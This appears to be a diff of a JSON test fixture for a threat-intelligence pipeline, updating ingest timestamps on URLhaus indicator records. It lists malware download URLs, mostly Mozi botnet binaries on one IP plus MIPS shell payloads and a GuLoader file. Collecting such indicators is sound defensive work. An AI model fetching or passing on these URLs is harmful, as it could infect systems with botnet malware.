"event": { - "ingested": "2021-12-13T08:40:08.026083900Z", + "ingested": "2021-12-14T14:56:15.726475688Z", "original": "{\"id\":\"961328\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961328/\",\"url\":\"http://89.160.20.156:60680/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -10780,7 +10780,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026090800Z", + "ingested": "2021-12-14T14:56:15.726476097Z", "original": "{\"id\":\"961329\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961329/\",\"url\":\"http://89.160.20.156:51132/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -10829,7 +10829,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026097700Z", + "ingested": "2021-12-14T14:56:15.726476456Z", "original": "{\"id\":\"961330\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961330/\",\"url\":\"http://89.160.20.156:39049/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -10878,7 +10878,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026104600Z", + "ingested": "2021-12-14T14:56:15.726476809Z", "original": "{\"id\":\"961321\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961321/\",\"url\":\"http://89.160.20.156:57455/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:49:12 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -10927,7 +10927,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026111400Z", + "ingested": "2021-12-14T14:56:15.726477168Z", "original": "{\"id\":\"961320\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961320/\",\"url\":\"http://89.160.20.156:32823/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:49:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -10976,7 +10976,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026118300Z", + "ingested": "2021-12-14T14:56:15.726477629Z", "original": "{\"id\":\"961318\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961318/\",\"url\":\"http://89.160.20.156:44103/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:49:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -11025,7 +11025,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026125200Z", + "ingested": "2021-12-14T14:56:15.726477992Z", "original": "{\"id\":\"961319\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961319/\",\"url\":\"http://89.160.20.156:36257/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:49:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -11075,7 +11075,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026132200Z", + "ingested": "2021-12-14T14:56:15.726478381Z", "original": "{\"id\":\"961317\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961317/\",\"url\":\"http://89.160.20.156:41921/bin.sh\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:45:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", @@ -11124,7 +11124,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026170200Z", + "ingested": "2021-12-14T14:56:15.726478801Z", "original": "{\"id\":\"961316\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961316/\",\"url\":\"http://89.160.20.156:50971/i\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:44:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", @@ -11173,7 +11173,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026178200Z", + "ingested": "2021-12-14T14:56:15.726479300Z", "original": "{\"id\":\"961315\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961315/\",\"url\":\"http://89.160.20.156:56339/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:36:13 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -11222,7 +11222,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026185200Z", + "ingested": "2021-12-14T14:56:15.726479755Z", "original": "{\"id\":\"961314\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961314/\",\"url\":\"http://89.160.20.156:52551/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:36:09 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -11271,7 +11271,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026192200Z", + "ingested": "2021-12-14T14:56:15.726480108Z", "original": "{\"id\":\"961312\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961312/\",\"url\":\"http://89.160.20.156:35942/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:36:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -11320,7 +11320,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026199100Z", + "ingested": "2021-12-14T14:56:15.726480464Z", "original": "{\"id\":\"961313\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961313/\",\"url\":\"http://89.160.20.156:39636/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:36:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -11369,7 +11369,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026205900Z", + "ingested": "2021-12-14T14:56:15.726480890Z", "original": "{\"id\":\"961310\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961310/\",\"url\":\"http://89.160.20.156:53548/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:36:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -11418,7 +11418,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026212900Z", + "ingested": "2021-12-14T14:56:15.726481420Z", "original": "{\"id\":\"961311\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961311/\",\"url\":\"http://89.160.20.156:40967/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:36:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -11467,7 +11467,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026219700Z", + "ingested": "2021-12-14T14:56:15.726481774Z", "original": "{\"id\":\"961309\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961309/\",\"url\":\"http://89.160.20.156:49471/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:36:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -11516,7 +11516,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026226500Z", + "ingested": "2021-12-14T14:56:15.726482126Z", "original": "{\"id\":\"961302\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961302/\",\"url\":\"http://89.160.20.156:43937/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -11565,7 +11565,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026233400Z", + "ingested": "2021-12-14T14:56:15.726482484Z", "original": "{\"id\":\"961303\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961303/\",\"url\":\"http://89.160.20.156:57992/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -11614,7 +11614,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026240400Z", + "ingested": "2021-12-14T14:56:15.726482950Z", "original": "{\"id\":\"961304\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961304/\",\"url\":\"http://89.160.20.156:43603/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -11663,7 +11663,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026247200Z", + "ingested": "2021-12-14T14:56:15.726483304Z", "original": "{\"id\":\"961305\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961305/\",\"url\":\"http://89.160.20.156:37157/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -11712,7 +11712,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026254200Z", + "ingested": "2021-12-14T14:56:15.726483677Z", "original": "{\"id\":\"961306\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961306/\",\"url\":\"http://89.160.20.156:37229/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -11761,7 +11761,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026261400Z", + "ingested": "2021-12-14T14:56:15.726484305Z", "original": "{\"id\":\"961307\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961307/\",\"url\":\"http://89.160.20.156:49104/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -11810,7 +11810,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026268400Z", + "ingested": "2021-12-14T14:56:15.726484668Z", "original": "{\"id\":\"961308\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961308/\",\"url\":\"http://89.160.20.156:49575/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -11859,7 +11859,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026275300Z", + "ingested": "2021-12-14T14:56:15.726485023Z", "original": "{\"id\":\"961299\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961299/\",\"url\":\"http://89.160.20.156:50000/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:35:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -11908,7 +11908,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026282200Z", + "ingested": "2021-12-14T14:56:15.726485375Z", "original": "{\"id\":\"961300\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961300/\",\"url\":\"http://89.160.20.156:36251/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:35:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -11957,7 +11957,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026289200Z", + "ingested": "2021-12-14T14:56:15.726485874Z", "original": "{\"id\":\"961301\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961301/\",\"url\":\"http://89.160.20.156:51932/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:35:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -12006,7 +12006,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026296300Z", + "ingested": "2021-12-14T14:56:15.726486233Z", "original": "{\"id\":\"961297\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961297/\",\"url\":\"http://89.160.20.156:45660/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -12055,7 +12055,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026304700Z", + "ingested": "2021-12-14T14:56:15.726486585Z", "original": "{\"id\":\"961298\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961298/\",\"url\":\"http://89.160.20.156:42478/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -12104,7 +12104,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026311800Z", + "ingested": "2021-12-14T14:56:15.726486941Z", "original": "{\"id\":\"961296\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961296/\",\"url\":\"http://89.160.20.156:50726/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:34:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -12153,7 +12153,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026318700Z", + "ingested": "2021-12-14T14:56:15.726487378Z", "original": "{\"id\":\"961295\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961295/\",\"url\":\"http://89.160.20.156:40256/i\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:33:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", @@ -12203,7 +12203,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026325600Z", + "ingested": "2021-12-14T14:56:15.726487831Z", "original": "{\"id\":\"961294\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961294/\",\"url\":\"http://89.160.20.156:50971/bin.sh\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:29:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", 
@@ -12250,7 +12250,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026332500Z", + "ingested": "2021-12-14T14:56:15.726488260Z", "original": "{\"id\":\"961293\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961293/\",\"url\":\"https://realestatederivatives.com.ng/zx/janomo_hfWUGQvSPn0.bin\",\"url_status\":\"online\",\"host\":\"realestatederivatives.com.ng\",\"date_added\":\"2021-01-14 19:24:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"abused_legit_malware\",\"surbl\":\"not listed\"},\"reporter\":\"abuse_ch\",\"larted\":\"true\",\"tags\":[\"encrypted\",\"GuLoader\"]}", "category": "threat", "type": "indicator", @@ -12299,7 +12299,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026339400Z", + "ingested": "2021-12-14T14:56:15.726488619Z", "original": "{\"id\":\"961291\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961291/\",\"url\":\"http://89.160.20.156:33946/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:22:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -12348,7 +12348,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026346300Z", + "ingested": "2021-12-14T14:56:15.726488980Z", "original": "{\"id\":\"961292\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961292/\",\"url\":\"http://89.160.20.156:39990/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:22:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -12397,7 +12397,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026353200Z", + "ingested": "2021-12-14T14:56:15.726489447Z", "original": "{\"id\":\"961288\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961288/\",\"url\":\"http://89.160.20.156:60558/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:22:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -12446,7 +12446,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026360300Z", + "ingested": "2021-12-14T14:56:15.726489798Z", "original": "{\"id\":\"961289\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961289/\",\"url\":\"http://89.160.20.156:32989/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:22:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -12495,7 +12495,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026367300Z", + "ingested": "2021-12-14T14:56:15.726490261Z", "original": "{\"id\":\"961290\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961290/\",\"url\":\"http://89.160.20.156:52458/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:22:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -12544,7 +12544,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026374200Z", + "ingested": "2021-12-14T14:56:15.726490620Z", "original": "{\"id\":\"961286\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961286/\",\"url\":\"http://89.160.20.156:60735/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:21:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -12593,7 +12593,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026381100Z", + "ingested": "2021-12-14T14:56:15.726490977Z", "original": "{\"id\":\"961287\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961287/\",\"url\":\"http://89.160.20.156:34755/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:21:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -12642,7 +12642,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026388Z", + "ingested": "2021-12-14T14:56:15.726491344Z", "original": "{\"id\":\"961285\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961285/\",\"url\":\"http://89.160.20.156:39290/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:21:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -12691,7 +12691,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026394900Z", + "ingested": "2021-12-14T14:56:15.726491720Z", "original": "{\"id\":\"961279\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961279/\",\"url\":\"http://89.160.20.156:56141/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -12740,7 +12740,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026401900Z", + "ingested": "2021-12-14T14:56:15.726492073Z", "original": "{\"id\":\"961280\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961280/\",\"url\":\"http://89.160.20.156:40247/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -12789,7 +12789,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026408800Z", + "ingested": "2021-12-14T14:56:15.726492428Z", "original": "{\"id\":\"961281\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961281/\",\"url\":\"http://89.160.20.156:36619/i\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", 
